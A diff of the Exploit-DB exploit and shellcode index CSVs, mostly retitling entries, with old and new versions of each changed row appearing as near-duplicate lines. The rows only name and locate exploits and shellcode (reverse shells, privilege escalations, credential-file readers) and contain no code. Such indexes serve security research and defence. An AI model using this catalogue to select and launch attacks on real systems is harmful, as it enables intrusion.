134,exploits/hp-ux/local/134.c,"HP-UX B11.11 - '/usr/bin/ct' Format String Privilege Escalation",2003-12-16,watercloud,local,hp-ux,
140,exploits/linux/local/140.c,"XSOK 1.02 - '-xsokdir' Local Buffer Overflow Game",2004-01-02,c0wboy,local,linux,
141,exploits/linux/local/141.c,"Linux Kernel 2.4.23/2.6.0 - 'do_mremap()' Bound Checking Validator (1)",2004-01-06,"Christophe Devine",local,linux,
@ -6506,7 +6507,7 @@ id,file,description,date,author,type,platform,port
8189,exploits/windows/local/8189.txt,"VUPlayer 2.49 - '.cue' Universal Buffer Overflow",2009-03-10,Stack,local,windows,
8193,exploits/windows/local/8193.py,"RainbowPlayer 0.91 - Playlist Universal Overwrite (SEH)",2009-03-10,His0k4,local,windows,
8201,exploits/windows/local/8201.pl,"Foxit Reader 3.0 (Build 1301) - PDF Universal Buffer Overflow",2009-03-13,SkD,local,windows,
8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
8214,exploits/windows/local/8214.c,"Rosoft Media Player 4.2.1 (Windows XP SP2/3 French) - Local Buffer Overflow",2009-03-16,SimO-s0fT,local,windows,
8231,exploits/windows/local/8231.php,"CDex 1.70b2 (Windows XP SP3) - '.ogg' Local Buffer Overflow",2009-03-18,Nine:Situations:Group,local,windows,
8233,exploits/windows/local/8233.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow",2009-03-18,His0k4,local,windows,
8234,exploits/windows/local/8234.py,"Chasys Media Player 1.1 - '.pls' Local Stack Overflow (2)",2009-03-18,Encrypt3d.M!nd,local,windows,
@ -9245,7 +9246,7 @@ id,file,description,date,author,type,platform,port
41130,exploits/android/local/41130.txt,"Google Android TSP sysfs - 'cmd_store' Multiple Overflows",2017-01-19,"Google Security Research",local,android,
41144,exploits/windows/local/41144.txt,"Microsoft Power Point 2016 - Java Code Execution",2017-01-21,"Fady Mohammed Osman",local,windows,
41149,exploits/osx/local/41149.md,"Microsoft Remote Desktop Client for Mac 8.0.36 - Code Execution",2017-01-23,"Filippo Cavallarin",local,osx,
41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-24,"Donald Buczek",local,linux,
41152,exploits/linux/local/41152.txt,"GNU Screen 4.5.0 - Local Privilege Escalation (PoC)",2017-01-24,"Donald Buczek",local,linux,
41154,exploits/linux/local/41154.sh,"GNU Screen 4.5.0 - Local Privilege Escalation",2017-01-25,"Xiphos Research Ltd",local,linux,
41158,exploits/linux/local/41158.md,"Man-db 2.6.7.1 - Local Privilege Escalation",2015-12-02,halfdog,local,linux,
41171,exploits/linux/local/41171.txt,"Systemd 228 (SUSE 12 SP2 / Ubuntu Touch 15.04) - Local Privilege Escalation",2017-01-24,"Sebastian Krahmer",local,linux,
@ -9282,6 +9283,7 @@ id,file,description,date,author,type,platform,port
43494,exploits/windows/local/43494.cpp,"Jungo Windriver 12.5.1 - Local Privilege Escalation",2018-01-10,"Fidus InfoSecurity",local,windows,
43499,exploits/multiple/local/43499.txt,"Parity Browser < 1.6.10 - Bypass Same Origin Policy",2018-01-10,tintinweb,local,multiple,
43500,exploits/multiple/local/43500.txt,"Python smtplib 2.7.11 / 3.4.4 / 3.5.1 - Man In The Middle StartTLS Stripping",2016-07-03,tintinweb,local,multiple,
43775,exploits/linux/local/43775.c,"glibc - 'getcwd()' Local Privilege Escalation",2018-01-16,halfdog,local,linux,
41675,exploits/android/local/41675.rb,"Google Android 4.2 Browser and WebView - 'addJavascriptInterface' Code Execution (Metasploit)",2012-12-21,Metasploit,local,android,
41683,exploits/multiple/local/41683.rb,"Mozilla Firefox < 17.0.1 - Flash Privileged Code Injection (Metasploit)",2013-01-08,Metasploit,local,multiple,
41700,exploits/windows/local/41700.rb,"Sun Java Web Start Plugin - Command Line Argument Injection (Metasploit)",2010-04-09,Metasploit,local,windows,
@ -9346,7 +9348,7 @@ id,file,description,date,author,type,platform,port
42045,exploits/linux/local/42045.c,"VMware Workstation for Linux 12.5.2 build-4638234 - ALSA Configuration Host Root Privilege Escalation",2017-05-22,"Google Security Research",local,linux,
42053,exploits/linux/local/42053.c,"KDE 4/5 - 'KAuth' Local Privilege Escalation",2017-05-18,Stealth,local,linux,
42059,exploits/windows/local/42059.py,"Dup Scout Enterprise 9.7.18 - '.xml' Local Buffer Overflow",2017-05-24,ScrR1pTK1dd13,local,windows,
42076,exploits/linux/local/42076.py,"JAD java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
42076,exploits/linux/local/42076.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-05-26,"Juan Sacco",local,linux,
42077,exploits/windows/local/42077.txt,"Microsoft MsMpEng - Multiple Problems Handling ntdll!NtControlChannel Commands",2017-05-26,"Google Security Research",local,windows,
42116,exploits/windows/local/42116.txt,"Parallels Desktop - Virtual Machine Escape",2017-06-05,"Mohammad Reza Espargham",local,windows,
42119,exploits/windows/local/42119.txt,"Subsonic 6.1.1 - XML External Entity Injection",2017-06-05,hyp3rlinx,local,windows,
@ -9362,7 +9364,7 @@ id,file,description,date,author,type,platform,port
42174,exploits/windows/local/42174.py,"Easy MOV Converter 1.4.24 - 'Enter User Name' Local Buffer Overflow (SEH)",2017-06-13,abatchy17,local,windows,
42181,exploits/windows/local/42181.py,"VX Search Enterprise 9.7.18 - Local Buffer Overflow",2017-06-15,ScrR1pTK1dd13,local,windows,
42183,exploits/linux/local/42183.c,"Sudo 1.8.20 - 'get_process_ttyname()' Local Privilege Escalation",2017-06-14,"Qualys Corporation",local,linux,
42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow",2017-06-26,"Juan Sacco",local,linux,
42255,exploits/linux/local/42255.py,"JAD Java Decompiler 1.5.8e - Local Buffer Overflow (NX Enabled)",2017-06-26,"Juan Sacco",local,linux,
42265,exploits/linux/local/42265.py,"Flat Assembler 1.7.21 - Local Buffer Overflow",2017-06-28,"Juan Sacco",local,linux,
42267,exploits/windows/local/42267.py,"Easy File Sharing Web Server 7.2 - Account Import Local Buffer Overflow (SEH)",2017-06-28,Chako,local,windows,
42270,exploits/solaris_x86/local/42270.c,"Oracle Solaris 11.1/11.3 (RSH) - 'Stack Clash' Local Privilege Escalation",2017-06-28,"Qualys Corporation",local,solaris_x86,
@ -9695,7 +9697,7 @@ id,file,description,date,author,type,platform,port
675,exploits/windows/remote/675.txt,"Hosting Controller 0.6.1 Hotfix 1.4 - Directory Browsing",2004-12-05,Mouse,remote,windows,
681,exploits/linux/remote/681.c,"Citadel/UX 6.27 - Format String",2004-12-12,CoKi,remote,linux,504
689,exploits/multiple/remote/689.pl,"wget 1.9 - Directory Traversal",2004-12-15,jjminar,remote,multiple,
693,exploits/windows/remote/693.c,"Ability Server 2.34 - Remote APPE Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
693,exploits/windows/remote/693.c,"Ability Server 2.34 - 'APPE' Remote Buffer Overflow",2004-12-16,darkeagle,remote,windows,21
705,exploits/multiple/remote/705.pl,"Webmin - Brute Force / Command Execution",2004-12-22,Di42lo,remote,multiple,10000
711,exploits/windows/remote/711.c,"CrystalFTP Pro 2.8 - Remote Buffer Overflow",2005-04-24,cybertronic,remote,windows,21
712,exploits/linux/remote/712.c,"SHOUTcast DNAS/Linux 1.9.4 - Format String Remote Overflow",2004-12-23,pucik,remote,linux,8000
@ -9923,7 +9925,7 @@ id,file,description,date,author,type,platform,port
1885,exploits/windows/remote/1885.pl,"QBik WinGate WWW Proxy Server 6.1.1.1077 - 'POST' Remote Buffer Overflow",2006-06-07,kingcope,remote,windows,80
1889,exploits/hardware/remote/1889.txt,"D-Link DWL Series Access-Point 2.10na - Config Disclosure",2006-06-08,INTRUDERS,remote,hardware,
1906,exploits/windows/remote/1906.py,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow",2006-06-12,h07,remote,windows,
1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2006-06-15,c0rrupt,remote,windows,
1915,exploits/windows/remote/1915.pm,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (1)",2006-06-15,c0rrupt,remote,windows,
1940,exploits/windows/remote/1940.pm,"Microsoft Windows RRAS - Remote Stack Overflow (MS06-025) (Metasploit)",2006-06-22,"H D Moore",remote,windows,445
1965,exploits/windows/remote/1965.pm,"Microsoft Windows - RRAS RASMAN Registry Stack Overflow (MS06-025) (Metasploit)",2006-06-29,Pusscat,remote,windows,445
1997,exploits/multiple/remote/1997.php,"Webmin < 1.290 / Usermin < 1.220 - Arbitrary File Disclosure (PHP)",2006-07-09,joffer,remote,multiple,10000
@ -9943,9 +9945,9 @@ id,file,description,date,author,type,platform,port
2079,exploits/windows/remote/2079.pl,"eIQnetworks ESA - Syslog Server Remote Buffer Overflow",2006-07-27,"Kevin Finisterre",remote,windows,12345
2080,exploits/windows/remote/2080.pl,"eIQnetworks License Manager - Remote Buffer Overflow (multi) (1)",2006-07-27,"Kevin Finisterre",remote,windows,10616
2082,exploits/multiple/remote/2082.html,"Mozilla Firefox 1.5.0.4 - JavaScript Navigator Object Code Execution",2006-07-28,"H D Moore",remote,multiple,
2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-07,"Greg Sinclair",remote,hardware,
2136,exploits/hardware/remote/2136.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (1)",2006-08-07,"Greg Sinclair",remote,hardware,
2140,exploits/windows/remote/2140.pm,"eIQnetworks License Manager - Remote Buffer Overflow (Metasploit) (3)",2006-08-07,ri0t,remote,windows,10616
2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution",2006-08-08,PATz,remote,hardware,
2145,exploits/hardware/remote/2145.txt,"Barracuda Spam Firewall 3.3.03.053 - Remote Code Execution (2)",2006-08-08,PATz,remote,hardware,
2162,exploits/windows/remote/2162.pm,"Microsoft Windows - NetpIsRemote() Remote Overflow (MS06-040) (Metasploit)",2006-08-10,"H D Moore",remote,windows,445
2164,exploits/windows/remote/2164.pm,"Microsoft Internet Explorer - 'MDAC' Remote Code Execution (MS06-014) (Metasploit) (2)",2006-08-10,"H D Moore",remote,windows,
2185,exploits/linux/remote/2185.pl,"Cyrus IMAPD 2.3.2 - 'pop3d' Remote Buffer Overflow (3)",2006-08-14,K-sPecial,remote,linux,110
@ -10451,7 +10453,7 @@ id,file,description,date,author,type,platform,port
6217,exploits/windows/remote/6217.pl,"BlazeDVD 5.0 - '.PLF' Playlist File Remote Buffer Overflow",2008-08-10,LiquidWorm,remote,windows,
6220,exploits/windows/remote/6220.html,"Cisco WebEx Meeting Manager UCF - 'atucfobj.dll' ActiveX Remote Buffer Overflow",2008-08-10,"Guido Landi",remote,windows,
6227,exploits/windows/remote/6227.c,"IntelliTamper 2.07 - HTTP Header Remote Code Execution",2008-08-10,"Wojciech Pawlikowski",remote,windows,
6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal",2008-08-11,"Simon Ryeo",remote,multiple,
6229,exploits/multiple/remote/6229.txt,"Apache Tomcat < 6.0.18 - 'utf8' Directory Traversal (PoC)",2008-08-11,"Simon Ryeo",remote,multiple,
6236,exploits/multiple/remote/6236.txt,"BIND 9.5.0-P2 - 'Randomized Ports' Remote DNS Cache Poisoning",2008-08-13,Zbr,remote,multiple,
6238,exploits/windows/remote/6238.c,"IntelliTamper 2.07/2.08 Beta 4 - A HREF Remote Buffer Overflow",2008-08-13,kralor,remote,windows,
6248,exploits/windows/remote/6248.pl,"FlashGet 1.9.0.1012 - 'FTP PWD Response' SEH Stack Overflow",2008-08-15,SkOd,remote,windows,21
@ -11508,7 +11510,7 @@ id,file,description,date,author,type,platform,port
16710,exploits/windows/remote/16710.rb,"Trellian FTP Client 3.01 - PASV Remote Buffer Overflow (Metasploit)",2010-06-15,Metasploit,remote,windows,
16711,exploits/windows/remote/16711.rb,"EasyFTP Server 1.7.0.11 - MKD Command Stack Buffer Overflow (Metasploit)",2010-07-27,Metasploit,remote,windows,
16712,exploits/windows/remote/16712.rb,"BolinTech DreamFTP Server 1.02 - Format String (Metasploit)",2010-06-22,Metasploit,remote,windows,21
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit)",2011-02-23,Metasploit,remote,windows,
16713,exploits/windows/remote/16713.rb,"CesarFTP 0.99g - 'MKD' Remote Buffer Overflow (Metasploit) (2)",2011-02-23,Metasploit,remote,windows,
16714,exploits/windows_x86/remote/16714.rb,"Oracle 9i XDB (Windows x86) - FTP UNLOCK Overflow (Metasploit)",2010-10-05,Metasploit,remote,windows_x86,2100
16715,exploits/windows/remote/16715.rb,"RhinoSoft Serv-U FTPd Server - MDTM Overflow (Metasploit)",2010-09-20,Metasploit,remote,windows,21
16716,exploits/windows/remote/16716.rb,"Odin Secure FTP 4.1 - 'LIST' Remote Stack Buffer Overflow (Metasploit)",2010-11-14,Metasploit,remote,windows,
@ -14647,7 +14649,7 @@ id,file,description,date,author,type,platform,port
31694,exploits/windows/remote/31694.py,"Eudora Qualcomm WorldMail 9.0.333.0 - IMAPd Service UID Buffer Overflow",2014-02-16,"Muhammad ELHarmeel",remote,windows,
31695,exploits/php/remote/31695.rb,"Dexter (CasinoLoader) - SQL Injection (Metasploit)",2014-02-16,Metasploit,remote,php,
31706,exploits/unix/remote/31706.txt,"IBM Lotus Expeditor 6.1 - URI Handler Command Execution",2008-04-24,"Thomas Pollet",remote,unix,
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-18,Sumit,remote,windows,80
31736,exploits/windows/remote/31736.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (1)",2014-02-18,Sumit,remote,windows,80
31737,exploits/windows/remote/31737.rb,"Oracle Forms and Reports - Remote Code Execution (Metasploit)",2014-02-18,Metasploit,remote,windows,
31756,exploits/multiple/remote/31756.txt,"SonicWALL Email Security 6.1.1 - Error Page Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
31757,exploits/multiple/remote/31757.txt,"ZyWALL 100 HTTP Referer Header - Cross-Site Scripting",2008-05-08,"Deniz Cevik",remote,multiple,
@ -14658,7 +14660,7 @@ id,file,description,date,author,type,platform,port
31770,exploits/multiple/remote/31770.txt,"Oracle Application Server Portal 10g - Authentication Bypass",2008-05-09,"Deniz Cevik",remote,multiple,
31788,exploits/windows/remote/31788.py,"VideoCharge Studio 2.12.3.685 - 'GetHttpResponse()' Man In The Middle Remote Code Execution",2014-02-20,"Julien Ahrens",remote,windows,
31789,exploits/windows/remote/31789.py,"PCMan FTP Server 2.07 - Remote Buffer Overflow",2014-02-20,Sumit,remote,windows,21
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow",2014-02-22,"OJ Reeves",remote,windows,
31814,exploits/windows/remote/31814.py,"Ultra Mini HTTPD 1.21 - 'POST' Remote Stack Buffer Overflow (2)",2014-02-22,"OJ Reeves",remote,windows,80
31820,exploits/unix/remote/31820.pl,"IBM Lotus Sametime 8.0 - Multiplexer Buffer Overflow",2008-05-21,"Manuel Santamarina Suarez",remote,unix,
31828,exploits/hardware/remote/31828.txt,"Barracuda Spam Firewall 3.5.11 - 'ldap_test.cgi' Cross-Site Scripting",2008-05-22,"Information Risk Management Plc",remote,hardware,
31831,exploits/windows/remote/31831.py,"SolidWorks Workgroup PDM 2014 SP2 - Arbitrary File Write",2014-02-22,"Mohamed Shetta",remote,windows,30000
@ -16233,7 +16235,7 @@ id,file,description,date,author,type,platform,port
1011,exploits/asp/webapps/1011.php,"Maxwebportal 1.36 - 'Password.asp' Change Password (2) (PHP)",2005-05-26,mh_p0rtal,webapps,asp,
1012,exploits/asp/webapps/1012.txt,"Maxwebportal 1.36 - 'Password.asp' Change Password (1) (HTML)",2005-05-26,"Soroush Dalili",webapps,asp,
1013,exploits/php/webapps/1013.pl,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-26,"Petey Beege",webapps,php,
1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection",2005-05-27,"Danica Jones",webapps,php,
1014,exploits/php/webapps/1014.txt,"Invision Power Board 2.0.3 - 'login.php' SQL Injection (Tutorial)",2005-05-27,"Danica Jones",webapps,php,
1015,exploits/asp/webapps/1015.txt,"Hosting Controller 0.6.1 - Unauthenticated User Registration (3)",2005-05-27,"Soroush Dalili",webapps,asp,
1016,exploits/php/webapps/1016.pl,"phpStat 1.5 - 'setup.php' Authentication Bypass (Perl)",2005-05-30,Alpha_Programmer,webapps,php,
1017,exploits/php/webapps/1017.php,"phpStat 1.5 - 'setup.php' Authentication Bypass (PHP) (1)",2005-05-30,mh_p0rtal,webapps,php,
@ -19961,7 +19963,7 @@ id,file,description,date,author,type,platform,port
6677,exploits/php/webapps/6677.pl,"geccBBlite 2.0 - 'id' SQL Injection",2008-10-05,Piker,webapps,php,
6678,exploits/php/webapps/6678.txt,"Fastpublish CMS 1.9999 - Local File Inclusion / SQL Injection",2008-10-05,~!Dok_tOR!~,webapps,php,
6679,exploits/php/webapps/6679.txt,"phpAbook 0.8.8b - 'cookie' Local File Inclusion",2008-10-05,JosS,webapps,php,
6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload",2008-10-05,Pepelux,webapps,php,
6680,exploits/php/webapps/6680.txt,"FOSS Gallery Public 1.0 - Arbitrary File Upload (PoC)",2008-10-05,Pepelux,webapps,php,
6681,exploits/php/webapps/6681.txt,"PHP-Fusion Mod manuals - 'manual' SQL Injection",2008-10-05,boom3rang,webapps,php,
6682,exploits/php/webapps/6682.txt,"PHP-Fusion Mod raidtracker_panel - 'INFO_RAID_ID' SQL Injection",2008-10-05,boom3rang,webapps,php,
6683,exploits/php/webapps/6683.txt,"PHP-Fusion Mod recept - 'kat_id' SQL Injection",2008-10-05,boom3rang,webapps,php,
@ -33152,7 +33154,7 @@ id,file,description,date,author,type,platform,port
33239,exploits/php/webapps/33239.txt,"Vastal I-Tech Cosmetics Zone - 'view_products.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
33240,exploits/php/webapps/33240.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' SQL Injection",2009-09-22,OoN_Boy,webapps,php,
33241,exploits/php/webapps/33241.txt,"Vastal I-Tech DVD Zone - 'view_mag.php' Cross-Site Scripting",2009-09-22,OoN_Boy,webapps,php,
33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - SQL Injection",2009-09-23,OoN_Boy,webapps,php,
33242,exploits/php/webapps/33242.txt,"Vastal I-Tech Agent Zone - 'view_listing.php' SQL Injection",2009-09-23,OoN_Boy,webapps,php,
33345,exploits/php/webapps/33345.txt,"CuteNews 1.4.6 editnews Module - doeditnews Action Admin Moderation Bypass",2009-11-10,"Andrew Horton",webapps,php,
33343,exploits/php/webapps/33343.txt,"CuteNews 1.4.6 - 'result' Cross-Site Scripting",2009-11-10,"Andrew Horton",webapps,php,
33344,exploits/php/webapps/33344.txt,"CuteNews 1.4.6 - 'index.php' Cross-Site Request Forgery (New User Creation)",2009-11-10,"Andrew Horton",webapps,php,
@ -36014,11 +36016,11 @@ id,file,description,date,author,type,platform,port
37926,exploits/php/webapps/37926.txt,"Netsweeper 2.6.29.8 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
37927,exploits/php/webapps/37927.txt,"Netsweeper 4.0.4 - SQL Injection",2015-08-21,"Anastasios Monachos",webapps,php,
37928,exploits/php/webapps/37928.txt,"Netsweeper 4.0.8 - SQL Injection / Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37929,exploits/php/webapps/37929.txt,"Netsweeper 4.0.8 - Authentication Bypass (via Disabling of IP Quarantine)",2015-08-21,"Anastasios Monachos",webapps,php,
37930,exploits/php/webapps/37930.txt,"Netsweeper 4.0.9 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
37931,exploits/php/webapps/37931.txt,"Netsweeper 3.0.6 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37932,exploits/php/webapps/37932.txt,"Netsweeper 4.0.8 - Arbitrary File Upload / Execution",2015-08-21,"Anastasios Monachos",webapps,php,
37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass",2015-08-21,"Anastasios Monachos",webapps,php,
37933,exploits/php/webapps/37933.txt,"Netsweeper 4.0.8 - Authentication Bypass (via New Profile Creation)",2015-08-21,"Anastasios Monachos",webapps,php,
37934,exploits/php/webapps/37934.txt,"WordPress Plugin Shopp - Multiple Vulnerabilities",2012-10-05,T0x!c,webapps,php,
37935,exploits/php/webapps/37935.txt,"Interspire Email Marketer - Cross-Site Scripting / HTML Injection / SQL Injection",2012-10-08,"Ibrahim El-Sayed",webapps,php,
37936,exploits/php/webapps/37936.txt,"Open Realty - 'select_users_lang' Local File Inclusion",2012-10-06,L0n3ly-H34rT,webapps,php,
@ -37176,6 +37178,7 @@ id,file,description,date,author,type,platform,port
43678,exploits/hardware/webapps/43678.txt,"D-Link DSL-2640R - Unauthenticated DNS Change",2018-01-17,"Todor Donev",webapps,hardware,
43682,exploits/hardware/webapps/43682.txt,"Belkin N600DB Wireless Router - Multiple Vulnerabilities",2018-01-17,Wadeek,webapps,hardware,
43683,exploits/php/webapps/43683.txt,"SugarCRM 3.5.1 - Cross-Site Scripting",2018-01-17,"Guilherme Assmann",webapps,php,
43733,exploits/java/webapps/43733.rb,"Primefaces 5.x - Remote Code Execution (Metasploit)",2018-01-18,"Bjoern Schuette",webapps,java,
40542,exploits/php/webapps/40542.txt,"Student Information System (SIS) 0.1 - Authentication Bypass",2016-10-14,lahilote,webapps,php,
40543,exploits/php/webapps/40543.txt,"Web Based Alumni Tracking System 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
40544,exploits/php/webapps/40544.txt,"Simple Dynamic Web 0.1 - SQL Injection",2016-10-14,lahilote,webapps,php,
@ -37628,7 +37631,7 @@ id,file,description,date,author,type,platform,port
41456,exploits/php/webapps/41456.txt,"Joomla! Component Intranet Attendance Track 2.6.5 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41459,exploits/hardware/webapps/41459.py,"NETGEAR DGN2200v1/v2/v3/v4 - 'dnslookup.cgi' Remote Command Execution",2017-02-25,SivertPL,webapps,hardware,
41460,exploits/php/webapps/41460.txt,"Joomla! Component Gnosis 1.1.2 - 'id' SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
41461,exploits/multiple/webapps/41461.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) < 9.1.-1600 - Remote Code Execution (Metasploit)",2017-01-15,"Mehmet Ince",webapps,multiple,
41462,exploits/php/webapps/41462.txt,"Joomla! Component Appointments for JomSocial 3.8.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41463,exploits/php/webapps/41463.txt,"Joomla! Component My MSG 3.2.1 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
41464,exploits/php/webapps/41464.txt,"Joomla! Component Spinner 360 1.3.0 - SQL Injection",2017-02-25,"Ihsan Sencan",webapps,php,
@ -38333,7 +38336,7 @@ id,file,description,date,author,type,platform,port
42968,exploits/php/webapps/42968.txt,"Complain Management System - Hard-Coded Credentials / Blind SQL injection",2017-10-10,havysec,webapps,php,
43013,exploits/cgi/webapps/43013.txt,"Linksys E Series - Multiple Vulnerabilities",2017-10-18,"SEC Consult",webapps,cgi,
42971,exploits/php/webapps/42971.rb,"Trend Micro OfficeScan 11.0/XG (12.0) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42972,exploits/php/webapps/42972.rb,"Trend Micro InterScan Messaging Security (Virtual Appliance) - 'Proxy.php' Remote Code Execution (Metasploit)",2017-10-11,"Mehmet Ince",webapps,php,
42975,exploits/linux/webapps/42975.txt,"Trend Micro Data Loss Prevention Virtual Appliance 5.2 - Path Traversal",2017-10-11,"Leonardo Duarte",webapps,linux,
42978,exploits/php/webapps/42978.txt,"OctoberCMS 1.0.425 (Build 425) - Cross-Site Scripting",2017-10-12,"Ishaq Mohammed",webapps,php,
42979,exploits/php/webapps/42979.txt,"E-Sic Software livre CMS - 'q' SQL Injection",2017-10-12,"Guilherme Assmann",webapps,php,
@ -38392,7 +38395,7 @@ id,file,description,date,author,type,platform,port
43065,exploits/php/webapps/43065.py,"WordPress Plugin Ultimate Product Catalog 4.2.24 - PHP Object Injection",2017-10-30,tomplixsee,webapps,php,
43066,exploits/php/webapps/43066.txt,"Zomato Clone Script - 'resid' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43067,exploits/php/webapps/43067.txt,"Website Broker Script - 'status_id' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43068,exploits/php/webapps/43068.txt,"Vastal I-Tech Agent Zone - 'searchCommercial.php' / 'searchResidential.php' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43069,exploits/php/webapps/43069.txt,"Php Inventory - Arbitrary File Upload",2017-10-30,"Ihsan Sencan",webapps,php,
43070,exploits/php/webapps/43070.txt,"Online Exam Test Application - 'sort' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,
43071,exploits/php/webapps/43071.txt,"Nice PHP FAQ Script - 'nice_theme' SQL Injection",2017-10-30,"Ihsan Sencan",webapps,php,

Can't render this file because it is too large.

472
files_shellcodes.csv
View file

@ -17,13 +17,13 @@ id,file,description,date,author,type,platform
13256,shellcodes/bsd/13256.c,"BSD/x86 - Reverse TCP (192.168.2.33:6969/TCP) Shell Shellcode (129 bytes)",2004-09-26,"Sinan Eren",shellcode,bsd
13257,shellcodes/bsdi_x86/13257.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (45 bytes)",2004-09-26,duke,shellcode,bsdi_x86
13258,shellcodes/bsdi_x86/13258.txt,"BSDi/x86 - execve(/bin/sh) Shellcode (46 bytes)",2004-09-26,vade79,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13260,shellcodes/bsdi_x86/13260.c,"BSDi/x86 - execve(/bin/sh) + ToUpper Encoded Shellcode (97 bytes)",2004-09-26,anonymous,shellcode,bsdi_x86
13261,shellcodes/freebsd/13261.txt,"FreeBSD x86 / x64 - execve(/bin/sh) Anti-Debugging Shellcode (140 bytes)",2009-04-13,c0d3_z3r0,shellcode,freebsd
13262,shellcodes/freebsd_x86/13262.txt,"FreeBSD/x86 - setreuid + execve(pfctl -d) Shellcode (56 bytes)",2008-09-12,suN8Hclf,shellcode,freebsd_x86
13263,shellcodes/freebsd_x86/13263.txt,"FreeBSD/x86 - Reverse TCP (192.168.1.33:8000/TCP) cat /etc/passwd Shellcode (112 bytes)",2008-09-10,suN8Hclf,shellcode,freebsd_x86
13264,shellcodes/freebsd_x86/13264.txt,"FreeBSD/x86 - Kill All Processes Shellcode (12 bytes)",2008-09-09,suN8Hclf,shellcode,freebsd_x86
13265,shellcodes/freebsd_x86/13265.c,"FreeBSD/x86 - Reverse Connection (172.17.0.9:8000/TCP) + Receive Shellcode + Payload Loader + Return Results Null-Free Shellcode (90 bytes)",2008-09-05,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13266,shellcodes/freebsd_x86/13266.asm,"FreeBSD/x86 - execve(/bin/cat /etc/master.passwd) + Null-Free Shellcode (65 bytes)",2008-08-25,sm4x,shellcode,freebsd_x86
13267,shellcodes/freebsd_x86/13267.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:8000/TCP) Shell (/bin/sh) + Null-Free Shellcode (89 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13268,shellcodes/freebsd_x86/13268.asm,"FreeBSD/x86 - setuid(0) + execve(ipf -Fa) Shellcode (57 bytes)",2008-08-21,sm4x,shellcode,freebsd_x86
13269,shellcodes/freebsd_x86/13269.c,"FreeBSD/x86 - execve(/bin/sh) Encoded Shellcode (48 bytes)",2008-08-19,c0d3_z3r0,shellcode,freebsd_x86
@ -38,14 +38,14 @@ id,file,description,date,author,type,platform
13278,shellcodes/freebsd_x86/13278.asm,"FreeBSD/x86 - Reverse TCP (127.0.0.1:31337/TCP) Shell (/bin/sh) Shellcode (102 bytes)",2004-09-26,Scrippie,shellcode,freebsd_x86
13279,shellcodes/freebsd_x86-64/13279.c,"FreeBSD/x86-64 - exec /bin/sh Shellcode (31 bytes)",2009-05-18,"Hack'n Roll",shellcode,freebsd_x86-64
